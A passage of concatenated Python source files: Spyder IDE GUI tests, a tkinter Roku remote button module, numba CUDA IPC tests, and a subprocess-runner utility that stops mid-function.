emitted twice # One at the beginning of the file, and once at the breakpoint qtbot.waitUntil(lambda: 'test' in nsb.editor.source_model._data and nsb.editor.source_model._data['test']['view'] == '1', timeout=3000) # change value of test with qtbot.waitSignal(shell.executed): shell.execute("test = 1 + 1") # check value of test with qtbot.waitSignal(shell.executed): shell.execute("print('test =', test)") assert "test = 2" in shell._control.toPlainText() # change value of test with qtbot.waitSignal(shell.executed): shell.execute("test = 1 + 1 + 1") # do next with qtbot.waitSignal(shell.executed): shell.pdb_execute("!next") assert "test == 3" in shell._control.toPlainText() # Check the namespace browser is updated assert ('test' in nsb.editor.source_model._data and nsb.editor.source_model._data['test']['view'] == '3') @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.use_introspection @pytest.mark.preload_project @pytest.mark.skipif(os.name == 'nt', reason='Times out on Windows') def test_ordering_lsp_requests_at_startup(main_window, qtbot): """ Test the ordering of requests we send to the LSP at startup when a project was left open during the previous session. This is a regression test for spyder-ide/spyder#13351. """ # Wait until the LSP server is up. code_editor = main_window.editor.get_current_editor() qtbot.waitSignal(code_editor.completions_response_signal, timeout=30000) # Wait until the initial requests are sent to the server. lsp = main_window.completions.get_provider('lsp') python_client = lsp.clients['python'] qtbot.wait(5000) expected_requests = [ 'initialize', 'initialized', 'workspace/didChangeConfiguration', 'workspace/didChangeWorkspaceFolders', 'textDocument/didOpen', ] skip_intermediate = { 'initialized': {'workspace/didChangeConfiguration'} } lsp_requests = python_client['instance']._requests start_idx = lsp_requests.index((0, 'initialize')) request_order = [] expected_iter = iter(expected_requests) current_expected = next(expected_iter) for i in range(start_idx, len(lsp_requests)): if current_expected is None: break _, req_type = lsp_requests[i] if req_type == current_expected: request_order.append(req_type) current_expected = next(expected_iter, None) else: skip_set = skip_intermediate.get(current_expected, set({})) if req_type in skip_set: continue else: assert req_type == current_expected assert request_order == expected_requests @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.parametrize( 'main_window', [{'spy_config': ('tours', 'show_tour_message', 2)}], indirect=True) def test_tour_message(main_window, qtbot): """Test that the tour message displays and sends users to the tour.""" # Wait until window setup is finished, which is when the message appears tours = main_window.get_plugin(Plugins.Tours) tour_dialog = tours.get_container()._tour_dialog animated_tour = tours.get_container()._tour_widget qtbot.waitSignal(main_window.sig_setup_finished, timeout=30000) # Check that tour is shown automatically and manually show it assert tours.get_conf('show_tour_message') tours.show_tour_message(force=True) # Wait for the message to appear qtbot.waitUntil(lambda: bool(tour_dialog), timeout=5000) qtbot.waitUntil(lambda: tour_dialog.isVisible(), timeout=2000) # Check that clicking dismiss hides the dialog and disables it qtbot.mouseClick(tour_dialog.dismiss_button, Qt.LeftButton) qtbot.waitUntil(lambda: not tour_dialog.isVisible(), timeout=2000) assert not tours.get_conf('show_tour_message') # Confirm that calling show_tour_message() normally doesn't show it again tours.show_tour_message() qtbot.wait(2000) assert not tour_dialog.isVisible() # Ensure that it opens again with force=True tours.show_tour_message(force=True) qtbot.waitUntil(lambda: tour_dialog.isVisible(), timeout=5000) # Run the tour and confirm it's running and the dialog is closed qtbot.mouseClick(tour_dialog.launch_tour_button, Qt.LeftButton) qtbot.waitUntil(lambda: animated_tour.is_running, timeout=9000) assert not tour_dialog.isVisible() assert not tours.get_conf('show_tour_message') # Close the tour animated_tour.close_tour() qtbot.waitUntil(lambda: not animated_tour.is_running, timeout=9000) tour_dialog.hide() @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.use_introspection @pytest.mark.preload_complex_project @pytest.mark.skipif(not sys.platform.startswith('linux'), reason="Only works on Linux") def test_update_outline(main_window, qtbot, tmpdir): """ Test that files in the Outline pane are updated at startup and after switching projects. """ # Show outline explorer outline_explorer = main_window.outlineexplorer outline_explorer.toggle_view_action.setChecked(True) # Get Python editor trees treewidget = outline_explorer.get_widget().treewidget editors_py = [ editor for editor in treewidget.editor_ids.keys() if editor.get_language() == 'Python' ] # Wait a bit for trees to be filled qtbot.wait(25000) # Assert all Python editors are filled assert all( [ len(treewidget.editor_tree_cache[editor.get_id()]) == 4 for editor in editors_py ] ) # Split editor editorstack = main_window.editor.get_current_editorstack() editorstack.sig_split_vertically.emit() qtbot.wait(1000) # Select file with no outline in split editorstack editorstack = main_window.editor.get_current_editorstack() editorstack.set_stack_index(2) editor = editorstack.get_current_editor() assert osp.splitext(editor.filename)[1] == '.txt' assert editor.is_cloned # Assert tree is empty editor_tree = treewidget.current_editor tree = treewidget.editor_tree_cache[editor_tree.get_id()] assert len(tree) == 0 # Assert spinner is not shown assert not outline_explorer.get_widget()._spinner.isSpinning() # Hide outline from view outline_explorer.toggle_view_action.setChecked(False) # Remove content from first file editorstack.set_stack_index(0) editor = editorstack.get_current_editor() editor.selectAll() editor.cut() editorstack.save(index=0) # Assert outline was not updated qtbot.wait(1000) len(treewidget.editor_tree_cache[treewidget.current_editor.get_id()]) == 4 # Set some files as session without projects prev_filenames = ["prev_file_1.py", "prev_file_2.py"] prev_paths = [] for fname in prev_filenames: file = tmpdir.join(fname) file.write(read_asset_file("script_outline_1.py")) prev_paths.append(str(file)) CONF.set('editor', 'filenames', prev_paths) # Close project to open that file automatically main_window.projects.close_project() # Show outline again outline_explorer.toggle_view_action.setChecked(True) # Wait a bit for its tree to be filled qtbot.wait(3000) # Assert the editors were filled assert all( [ len(treewidget.editor_tree_cache[editor.get_id()]) == 4 for editor in treewidget.editor_ids.keys() ] ) # Remove test file from session CONF.set('editor', 'filenames', []) @pytest.mark.slow @flaky(max_runs=3) def test_prevent_closing(main_window, qtbot): """ Check we can bypass prevent closing. """ code = "print(1 + 6)\nprint(1 + 6)\n" # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Main variables debug_action = main_window.debug_toolbar_actions[0] debug_button = main_window.debug_toolbar.widgetForAction(debug_action) # Clear all breakpoints main_window.editor.clear_all_breakpoints() # create new file main_window.editor.new() code_editor = main_window.editor.get_focus_widget() code_editor.set_text(code) code_editor.debugger.toogle_breakpoint(line_number=1) # Start debugging with qtbot.waitSignal(shell.executed): qtbot.mouseClick(debug_button, Qt.LeftButton) CONF.set('ipython_console', 'pdb_prevent_closing', False) # Check we can close a file we debug if the option is disabled assert main_window.editor.get_current_editorstack().close_file() CONF.set('ipython_console', 'pdb_prevent_closing', True) # Check we are still debugging assert shell.is_debugging() @pytest.mark.slow @flaky(max_runs=3) def test_continue_first_line(main_window, qtbot): """ Check we can bypass prevent closing. """ code = "print('a =', 1 + 6)\nprint('b =', 1 + 8)\n" # Wait until the window is fully up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # Main variables debug_action = main_window.debug_toolbar_actions[0] debug_button = main_window.debug_toolbar.widgetForAction(debug_action) # Clear all breakpoints main_window.editor.clear_all_breakpoints() # create new file main_window.editor.new() code_editor = main_window.editor.get_focus_widget() code_editor.set_text(code) CONF.set('ipython_console', 'pdb_stop_first_line', False) # Start debugging with qtbot.waitSignal(shell.executed): qtbot.mouseClick(debug_button, Qt.LeftButton) # The debugging should finish qtbot.waitUntil(lambda: not shell.is_debugging()) CONF.set('ipython_console', 'pdb_stop_first_line', True) # Check everything was executed qtbot.waitUntil(lambda: "a = 7" in shell._control.toPlainText()) assert "b = 9" in shell._control.toPlainText() @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.use_introspection @pytest.mark.skipif(os.name == 'nt', reason="Fails on Windows") def test_outline_no_init(main_window, qtbot): # Open file in one of our directories without an __init__ file spy_dir = osp.dirname(get_module_path('spyder')) main_window.editor.load(osp.join(spy_dir, 'tools', 'rm_whitespace.py')) # Show outline explorer outline_explorer = main_window.outlineexplorer outline_explorer.toggle_view_action.setChecked(True) # Wait a bit for trees to be filled qtbot.wait(5000) # Get tree length treewidget = outline_explorer.get_widget().treewidget editor_id = list(treewidget.editor_ids.values())[1] # Assert symbols in the file are detected and shown assert len(treewidget.editor_tree_cache[editor_id]) > 0 @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(sys.platform.startswith('linux'), reason="Flaky on Linux") def test_pdb_without_comm(main_window, qtbot): """Check if pdb works without comm.""" ipyconsole = main_window.ipyconsole shell = ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) control = ipyconsole.get_widget().get_focus_widget() with qtbot.waitSignal(shell.executed): shell.execute("get_ipython().kernel.frontend_comm.close()") shell.execute("%debug print()") qtbot.waitUntil( lambda: shell._control.toPlainText().split()[-1] == 'ipdb>') qtbot.keyClicks(control, "print('Two: ' + str(1+1))") qtbot.keyClick(control, Qt.Key_Enter) qtbot.waitUntil( lambda: shell._control.toPlainText().split()[-1] == 'ipdb>') assert "Two: 2" in control.toPlainText() # Press step button and expect a sig_pdb_step signal with qtbot.waitSignal(shell.sig_pdb_step): main_window.editor.debug_command("step") # Stop debugging and expect an executed signal with qtbot.waitSignal(shell.executed): main_window.editor.stop_debugging() @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(not sys.platform.startswith('linux'), reason="Flaky on Mac and Windows") def test_print_comms(main_window, qtbot): """Test warning printed when comms print.""" # Write code with a cell to a file code = ("class Test:\n @property\n def shape(self):" "\n print((10,))") shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) control = main_window.ipyconsole.get_widget().get_focus_widget() nsb = main_window.variableexplorer.current_widget() # Create some output from spyder call with qtbot.waitSignal(shell.executed): shell.execute(code) assert nsb.editor.source_model.rowCount() == 0 with qtbot.waitSignal(shell.executed): shell.execute("a = Test()") # Wait until the object has appeared in the variable explorer qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1, timeout=EVAL_TIMEOUT) # Make sure the warning is printed assert ("Output from spyder call 'get_namespace_view':" in control.toPlainText()) @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif(os.name == 'nt', reason="UTF8 on Windows") def test_goto_find(main_window, qtbot, tmpdir): """Test find goes to the right place.""" # Use UTF8 only character to make sure positions are respected code = "we Weee wee\nWe\n🚫 wee" match_positions = [ (0, 2), (3, 7), (8, 11), (12, 14), (18, 21) ] subdir = tmpdir.mkdir("find-sub") p = subdir.join("find-test.py") p.write(code) main_window.editor.load(to_text_string(p)) code_editor = main_window.editor.get_focus_widget() main_window.explorer.chdir(str(subdir)) main_window.findinfiles.switch_to_plugin() findinfiles = main_window.findinfiles.get_widget() findinfiles.set_search_text("we+") findinfiles.search_regexp_action.setChecked(True) findinfiles.case_action.setChecked(False) with qtbot.waitSignal(findinfiles.sig_finished, timeout=SHELL_TIMEOUT): findinfiles.find() results = findinfiles.result_browser.data assert len(results) == 5 assert len(findinfiles.result_browser.files) == 1 file_item = list(findinfiles.result_browser.files.values())[0] assert file_item.childCount() == 5 for i in range(5): item = file_item.child(i) findinfiles.result_browser.setCurrentItem(item) findinfiles.result_browser.activated(item) cursor = code_editor.textCursor() position = (cursor.selectionStart(), cursor.selectionEnd()) assert position == match_positions[i] @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif( os.name == 'nt', reason="test fails on windows.") def test_copy_paste(main_window, qtbot, tmpdir): """Test copy paste.""" code = ( "if True:\n" " class a():\n" " def b():\n" " print()\n" " def c():\n" " print()\n" ) shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) # create new file main_window.editor.new() code_editor = main_window.editor.get_focus_widget() code_editor.set_text(code) # Test copy cursor = code_editor.textCursor() cursor.setPosition(69) cursor.movePosition(QTextCursor.End, QTextCursor.KeepAnchor) code_editor.setTextCursor(cursor) qtbot.keyClick(code_editor, "c", modifier=Qt.ControlModifier) assert QApplication.clipboard().text() == ( "def c():\n print()\n") assert CLIPBOARD_HELPER.metadata_indent == 8 # Test paste in console qtbot.keyClick(shell._control, "v", modifier=Qt.ControlModifier) expected = "In [1]: def c():\n ...: print()" assert expected in shell._control.toPlainText() # Test paste at zero indentation qtbot.keyClick(code_editor, Qt.Key_Backspace) qtbot.keyClick(code_editor, Qt.Key_Backspace) qtbot.keyClick(code_editor, Qt.Key_Backspace) # Check again that the clipboard is ready assert QApplication.clipboard().text() == ( "def c():\n print()\n") assert CLIPBOARD_HELPER.metadata_indent == 8 qtbot.keyClick(code_editor, "v", modifier=Qt.ControlModifier) assert "\ndef c():\n print()" in code_editor.toPlainText() # Test paste at automatic indentation qtbot.keyClick(code_editor, "z", modifier=Qt.ControlModifier) qtbot.keyClick(code_editor, Qt.Key_Tab) qtbot.keyClick(code_editor, "v", modifier=Qt.ControlModifier) expected = ( "\n" " def c():\n" " print()\n" ) assert expected in code_editor.toPlainText() @pytest.mark.slow @pytest.mark.skipif(not running_in_ci(), reason="Only works in CIs") def test_add_external_plugins_to_dependencies(main_window): """Test that we register external plugins in the main window.""" external_names = [] for dep in DEPENDENCIES: name = getattr(dep, 'package_name', None) if name: external_names.append(name) assert 'spyder-boilerplate' in external_names @pytest.mark.slow @flaky(max_runs=3) def test_print_multiprocessing(main_window, qtbot, tmpdir): """Test print commands from multiprocessing.""" # Write code with a cell to a file code = """ import multiprocessing import sys def test_func(): print("Test stdout") print("Test stderr", file=sys.stderr) if __name__ == "__main__": p = multiprocessing.Process(target=test_func) p.start() p.join() """ p = tmpdir.join("print-test.py") p.write(code) main_window.editor.load(to_text_string(p)) shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) control = main_window.ipyconsole.get_widget().get_focus_widget() # Click the run button run_action = main_window.run_toolbar_actions[0] run_button = main_window.run_toolbar.widgetForAction(run_action) with qtbot.waitSignal(shell.executed): qtbot.mouseClick(run_button, Qt.LeftButton) qtbot.wait(1000) assert 'Test stdout' in control.toPlainText() assert 'Test stderr' in control.toPlainText() @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.skipif( os.name == 'nt', reason="ctypes.string_at(0) doesn't segfaults on Windows") def test_print_faulthandler(main_window, qtbot, tmpdir): """Test printing segfault info from kernel crashes.""" # Write code with a cell to a file code = """ def crash_func(): import ctypes; ctypes.string_at(0) crash_func() """ p = tmpdir.join("print-test.py") p.write(code) main_window.editor.load(to_text_string(p)) shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) control = main_window.ipyconsole.get_widget().get_focus_widget() # Click the run button run_action = main_window.run_toolbar_actions[0] run_button = main_window.run_toolbar.widgetForAction(run_action) qtbot.mouseClick(run_button, Qt.LeftButton) qtbot.wait(5000) assert 'Segmentation fault' in control.toPlainText() assert 'in crash_func' in control.toPlainText() @pytest.mark.slow @flaky(max_runs=3) @pytest.mark.parametrize("focus_to_editor", [True, False]) def test_focus_to_editor(main_window, qtbot, tmpdir, focus_to_editor): """Test that the focus_to_editor option works as expected.""" # Write code with cells to a file code = """# %% def foo(x): return 2 * x # %% foo(1) """ p = tmpdir.join("test.py") p.write(code) # Load code in the editor main_window.editor.load(to_text_string(p)) # Change focus_to_editor option main_window.editor.set_option('focus_to_editor', focus_to_editor) main_window.editor.apply_plugin_settings({'focus_to_editor'}) code_editor = main_window.editor.get_current_editor() # Wait for the console to be up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) control = main_window.ipyconsole.get_widget().get_focus_widget() # Be sure the focus is on the editor before proceeding code_editor.setFocus() # Select the run cell button to click it run_cell_action = main_window.run_toolbar_actions[1] run_cell_button = main_window.run_toolbar.widgetForAction(run_cell_action) # Make sure we don't switch to the console after pressing the button if focus_to_editor: with qtbot.assertNotEmitted( main_window.ipyconsole.sig_switch_to_plugin_requested, wait=1000 ): qtbot.mouseClick(run_cell_button, Qt.LeftButton) else: qtbot.mouseClick(run_cell_button, Qt.LeftButton) qtbot.wait(1000) # Check the right widget has focus focus_widget = QApplication.focusWidget() if focus_to_editor: assert focus_widget is code_editor else: assert focus_widget is control # Give focus back to the editor before running the next test if not focus_to_editor: code_editor.setFocus() # Move cursor to last line to run it cursor = code_editor.textCursor() cursor.movePosition(QTextCursor.End, QTextCursor.MoveAnchor) cursor.movePosition(QTextCursor.PreviousBlock, QTextCursor.KeepAnchor) code_editor.setTextCursor(cursor) # Select the run selection button to click it run_selection_action = main_window.run_toolbar_actions[3] run_selection_button = main_window.run_toolbar.widgetForAction( run_selection_action) # Make sure we don't switch to the console after pressing the button if focus_to_editor: with qtbot.assertNotEmitted( main_window.ipyconsole.sig_switch_to_plugin_requested, wait=1000 ): qtbot.mouseClick(run_selection_button, Qt.LeftButton) else: qtbot.mouseClick(run_selection_button, Qt.LeftButton) qtbot.wait(1000) # Check the right widget has focus focus_widget = QApplication.focusWidget() if focus_to_editor: assert focus_widget is code_editor else: assert focus_widget is control @pytest.mark.slow @flaky(max_runs=3) def test_focus_to_consoles(main_window, qtbot): """ Check that we give focus to the text widget of our consoles after focus is given to their dockwidgets. """ # Wait for the console to be up shell = main_window.ipyconsole.get_current_shellwidget() qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT) control = main_window.ipyconsole.get_widget().get_focus_widget() # Show internal console console = main_window.get_plugin(Plugins.Console) console.toggle_view_action.setChecked(True) # Change to the IPython console and assert focus is given to its focus # widget main_window.ipyconsole.dockwidget.raise_() focus_widget = QApplication.focusWidget() assert focus_widget is control # Change to the Internal console and assert focus is given to its focus # widget console.dockwidget.raise_() focus_widget = QApplication.focusWidget() assert focus_widget is console.get_widget().get_focus_widget() if __name__ == "__main__": pytest.main()
buttons.py
from abc import abstractmethod from threading import Thread import tkinter as tk MARGIN = 5 BUTTON_HEIGHT = 1 BUTTON_WIDTH = 5 PADDING_X = "2m" PADDING_Y = "1m" class RokuButton(tk.Button): def __init__(self, root, *args, **kwargs): super().__init__(root, *args, **kwargs) self.configure(height=BUTTON_HEIGHT, width=BUTTON_WIDTH) self.grid( sticky="nsew", padx=MARGIN, pady=MARGIN, ipadx=PADDING_X, ipady=PADDING_Y, ) def shape(self, length, width): self.grid(rowspan=length, columnspan=width) return self def place(self, row=0, col=0): self.grid(row=row, column=col) return self @abstractmethod def pressed(self, device): pass class RokuActionButton(RokuButton): def __init__(self, root, action, *args, **kwargs): super().__init__(root, *args, **kwargs) self.action = action self.configure( height=BUTTON_HEIGHT + 1, text=action, command=self.pressed, ) self.grid( sticky="nsew", padx=MARGIN, pady=MARGIN, ipadx=PADDING_X, ipady=PADDING_Y, ) self.shape(1, 2) def pressed(self): device = self.master.state.selected self.master._button_pressed_queue.put(self.action) if device: thread = Thread( target=device.key_press, args=(self.master._button_pressed_queue.get(),), daemon=True, ) thread.start() print(f"pressed {self.action}") else: print("Please select a device.") class RokuApplicationButton(RokuButton): def __init__(self, root, app, *args, **kwargs): super().__init__(root, *args, **kwargs) self.app = app self.configure( height=BUTTON_HEIGHT + 1, text=app, command=self.pressed, ) self.grid( sticky="nsew", padx=MARGIN, pady=MARGIN, ipadx=PADDING_X, ipady=PADDING_Y, ) self.shape(1, 6) def pressed(self): device = self.master.state.selected self.master._button_pressed_queue.put(self.app) if device: thread = Thread( target=device[self.master._button_pressed_queue.get()].launch, daemon=True, ) thread.start() print(f"Pressed {self.app}") else: print("Please select a device.")
test_ipc.py
from __future__ import absolute_import, print_function, division import sys import multiprocessing as mp import traceback import pickle import numpy as np from numba import cuda from numba.cuda.cudadrv import drvapi, devicearray from numba import unittest_support as unittest from numba.cuda.testing import skip_on_cudasim, CUDATestCase not_linux = not sys.platform.startswith('linux') has_mp_get_context = hasattr(mp, 'get_context') def core_ipc_handle_test(the_work, result_queue): try: arr = the_work() except: # FAILED. propagate the exception as a string succ = False out = traceback.format_exc() else: # OK. send the ndarray back succ = True out = arr result_queue.put((succ, out)) def base_ipc_handle_test(handle, size, result_queue): def the_work(): dtype = np.dtype(np.intp) with cuda.open_ipc_array(handle, shape=size // dtype.itemsize, dtype=dtype) as darr: # copy the data to host return darr.copy_to_host() core_ipc_handle_test(the_work, result_queue) def serialize_ipc_handle_test(handle, result_queue): def the_work(): dtype = np.dtype(np.intp) darr = handle.open_array(cuda.current_context(), shape=handle.size // dtype.itemsize, dtype=dtype) # copy the data to host arr = darr.copy_to_host() handle.close() return arr core_ipc_handle_test(the_work, result_queue) def ipc_array_test(ipcarr, result_queue): try: with ipcarr as darr: arr = darr.copy_to_host() try: # should fail to reopen with ipcarr: pass except ValueError as e: if str(e) != 'IpcHandle is already opened': raise AssertionError('invalid exception message') else: raise AssertionError('did not raise on reopen') except: # FAILED. propagate the exception as a string succ = False out = traceback.format_exc() else: # OK. send the ndarray back succ = True out = arr result_queue.put((succ, out)) @unittest.skipIf(not_linux, "IPC only supported on Linux") @unittest.skipUnless(has_mp_get_context, "requires multiprocessing.get_context") @skip_on_cudasim('Ipc not available in CUDASIM') class TestIpcMemory(CUDATestCase): def test_ipc_handle(self): # prepare data for IPC arr = np.arange(10, dtype=np.intp) devarr = cuda.to_device(arr) # create IPC handle ctx = cuda.current_context() ipch = ctx.get_ipc_handle(devarr.gpu_data) # manually prepare for serialization as bytes handle_bytes = bytes(ipch.handle) size = ipch.size # spawn new process for testing ctx = mp.get_context('spawn') result_queue = ctx.Queue() args = (handle_bytes, size, result_queue) proc = ctx.Process(target=base_ipc_handle_test, args=args) proc.start() succ, out = result_queue.get() if not succ: self.fail(out) else: np.testing.assert_equal(arr, out) proc.join(3) def test_ipc_handle_serialization(self): # prepare data for IPC arr = np.arange(10, dtype=np.intp) devarr = cuda.to_device(arr) # create IPC handle ctx = cuda.current_context() ipch = ctx.get_ipc_handle(devarr.gpu_data) # pickle buf = pickle.dumps(ipch) ipch_recon = pickle.loads(buf) self.assertIs(ipch_recon.base, None) self.assertEqual(tuple(ipch_recon.handle), tuple(ipch.handle)) self.assertEqual(ipch_recon.size, ipch.size) # spawn new process for testing ctx = mp.get_context('spawn') result_queue = ctx.Queue() args = (ipch, result_queue) proc = ctx.Process(target=serialize_ipc_handle_test, args=args) proc.start() succ, out = result_queue.get() if not succ: self.fail(out) else: np.testing.assert_equal(arr, out) proc.join(3) def test_ipc_array(self): # prepare data for IPC arr = np.arange(10, dtype=np.intp) devarr = cuda.to_device(arr) ipch = devarr.get_ipc_handle() # spawn new process for testing ctx = mp.get_context('spawn') result_queue = ctx.Queue() args = (ipch, result_queue) proc = ctx.Process(target=ipc_array_test, args=args) proc.start() succ, out = result_queue.get() if not succ: self.fail(out) else: np.testing.assert_equal(arr, out) proc.join(3) @unittest.skipUnless(not_linux, "Only on OS other than Linux") @skip_on_cudasim('Ipc not available in CUDASIM') class TestIpcNotSupported(CUDATestCase): def test_unsupported(self): arr = np.arange(10, dtype=np.intp) devarr = cuda.to_device(arr) with self.assertRaises(OSError) as raises: devarr.get_ipc_handle() errmsg = str(raises.exception) self.assertIn('OS does not support CUDA IPC', errmsg) def staged_ipc_handle_test(handle, device_num, result_queue): def the_work(): with cuda.gpus[device_num]: this_ctx = cuda.devices.get_context() can_access = handle.can_access_peer(this_ctx) print('can_access_peer {} {}'.format(this_ctx, can_access)) deviceptr = handle.open_staged(this_ctx) arrsize = handle.size // np.dtype(np.intp).itemsize hostarray = np.zeros(arrsize, dtype=np.intp) cuda.driver.device_to_host( hostarray, deviceptr, size=handle.size, ) handle.close() return hostarray core_ipc_handle_test(the_work, result_queue) def staged_ipc_array_test(ipcarr, device_num, result_queue): try: with cuda.gpus[device_num]: this_ctx = cuda.devices.get_context() print(this_ctx.device) with ipcarr as darr: arr = darr.copy_to_host() try: # should fail to reopen with ipcarr: pass except ValueError as e: if str(e) != 'IpcHandle is already opened': raise AssertionError('invalid exception message') else: raise AssertionError('did not raise on reopen') except: # FAILED. propagate the exception as a string succ = False out = traceback.format_exc() else: # OK. send the ndarray back succ = True out = arr result_queue.put((succ, out)) @unittest.skipIf(not_linux, "IPC only supported on Linux") @unittest.skipUnless(has_mp_get_context, "requires multiprocessing.get_context") @skip_on_cudasim('Ipc not available in CUDASIM') class TestIpcStaged(CUDATestCase): def test_staged(self): # prepare data for IPC arr = np.arange(10, dtype=np.intp) devarr = cuda.to_device(arr) # spawn new process for testing mpctx = mp.get_context('spawn') result_queue = mpctx.Queue() # create IPC handle ctx = cuda.current_context() ipch = ctx.get_ipc_handle(devarr.gpu_data) # pickle buf = pickle.dumps(ipch) ipch_recon = pickle.loads(buf) self.assertIs(ipch_recon.base, None) self.assertEqual(tuple(ipch_recon.handle), tuple(ipch.handle)) self.assertEqual(ipch_recon.size, ipch.size) # Test on every CUDA devices for device_num in range(len(cuda.gpus)): args = (ipch, device_num, result_queue) proc = mpctx.Process(target=staged_ipc_handle_test, args=args) proc.start() succ, out = result_queue.get() proc.join(3) if not succ: self.fail(out) else: np.testing.assert_equal(arr, out) def test_ipc_array(self): for device_num in range(len(cuda.gpus)): # prepare data for IPC arr = np.random.random(10) devarr = cuda.to_device(arr) ipch = devarr.get_ipc_handle() # spawn new process for testing ctx = mp.get_context('spawn') result_queue = ctx.Queue() args = (ipch, device_num, result_queue) proc = ctx.Process(target=staged_ipc_array_test, args=args) proc.start() succ, out = result_queue.get() proc.join(3) if not succ: self.fail(out) else: np.testing.assert_equal(arr, out) if __name__ == '__main__': unittest.main()
SubprocessRunner.py
# Copyright 2016 Ufora Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import subprocess import os import fcntl import time import select import threading import logging import Queue import traceback setupLock = threading.Lock() class SubprocessRunner(object): def __init__(self, subprocessArguments, onStdOut, onStdErr, env=None, enablePartialLineOutput=False): self.onStdOut = onStdOut self.onStdErr = onStdErr self.subprocessArguments = subprocessArguments self.env = env self.enablePartialLineOutput = enablePartialLineOutput self.pipeReadBufferSize = 1024 self.onDisconnected = None self.subprocessOutThread = None self.isShuttingDown = False self.process = None self.isStarted = False self.messagePumpThread = None self.messagePumpQueue = Queue.Queue() self.subprocessStdIn = None self.subprocessStdOut = None self.subprocessStdErr = None self.subprocessOutputThread = None def start(self): with setupLock: assert self.subprocessOutThread is None or not self.subprocessOutThread.is_alive() stdInRead, stdInWrite = os.pipe() stdOutRead, stdOutWrite = os.pipe() stdErrRead, stdErrWrite = os.pipe() self.subprocessStdIn = os.fdopen(stdInWrite, 'w', 1) self.subprocessStdOut = os.fdopen(stdOutRead, 'r', 1) self.subprocessStdErr = os.fdopen(stdErrRead, 'r', 1) if self.enablePartialLineOutput: # enable non-blocking reads fcntl.fcntl(self.subprocessStdOut, fcntl.F_SETFL, os.O_NONBLOCK) fcntl.fcntl(self.subprocessStdErr, fcntl.F_SETFL, os.O_NONBLOCK) self.subprocessStdInFileDescriptor = stdInWrite self.subprocessStdOutFileDescriptor = stdOutRead self.subprocessStdErrFileDescriptor = stdErrRead self.subprocessStdOutFromOtherSide = os.fdopen(stdOutWrite, 'w', 1) self.subprocessStdErrFromOtherSide = os.fdopen(stdErrWrite, 'w', 1) #start our reading threads BEFORE we open the process self.subprocessOutThread = threading.Thread( target=self.processOutputLoop, args=('stdOut', self.subprocessStdOut, self.onStdOut) ) self.subprocessOutThread.start() self.subprocessErrThread = threading.Thread( target=self.processOutputLoop, args=('stdErr', self.subprocessStdErr, self.onStdErr) ) self.subprocessErrThread.start() logging.debug("SubprocessRunner subprocess.Popen call starting with arguments %s", self.subprocessArguments) subprocessEvent = threading.Event() def startSubprocess(): self.process = subprocess.Popen( self.subprocessArguments, stdin=stdInRead, stdout=stdOutWrite, stderr=stdErrWrite, env=self.env ) subprocessEvent.set() startSubprocessThread = threading.Thread(target=startSubprocess) startSubprocessThread.start() subprocessEvent.wait(10.0) assert subprocessEvent.isSet(), "Failed to start the subprocess process." os.close(stdInRead) self.isStarted = True # return self to allow chaining like: runner.start().wait(...) return self @property def pid(self): if self.process is None: return None else: return self.process.pid def __str__(self): return "Subprocess(isStarted=%s, args=%s)" % (self.isStarted, self.subprocessArguments) def write(self, content): assert self.isStarted, "Process is not started." self.subprocessStdIn.write(content) def flush(self): self.subprocessStdIn.flush() def stop(self): try: if self.process: #disconnect the subprocess try: result = self.process.poll() if result is None: self.process.kill() except OSError: pass self.process.wait() logging.debug("Subprocess has shut down successfully") self.isShuttingDown = True if self.subprocessOutThread is not None and not self.isSuprocessOutThread(): self.subprocessStdOutFromOtherSide.write("\n") self.subprocessOutThread.join() self.subprocessStdOutFromOtherSide.close() if self.subprocessErrThread is not None and not self.isSuprocessErrThread(): self.subprocessStdErrFromOtherSide.write("\n") self.subprocessErrThread.join() self.subprocessStdErrFromOtherSide.close() self.subprocessStdIn.close() logging.debug("SubprocessRunner has shut down successfully") finally: self.isShuttingDown = False def terminate(self): assert self.isStarted self.process.terminate() def kill(self): assert self.isStarted self.process.kill() def poll(self): return self.process.poll() def wait(self, timeout=None, interval=.1): if timeout is None: return self.process.wait() toStopTime = time.time() + timeout while self.process.poll() is None and time.time() < toStopTime: time.sleep(interval) return self.process.poll() def isSuprocessOutThread(self): return threading.currentThread().ident == self.subprocessOutThread.ident def isSuprocessErrThread(self): return threading.currentThread().ident == self.subprocessOutThread.ident def processOutputLoop(self, description, outputFile, onDataCallback): try: while not self.isShuttingDown: if self.enablePartialLineOutput: r = select.select([outputFile], [], [])[0] if len(r): stdErrMessage = r[0].read(self.pipeReadBufferSize) else: 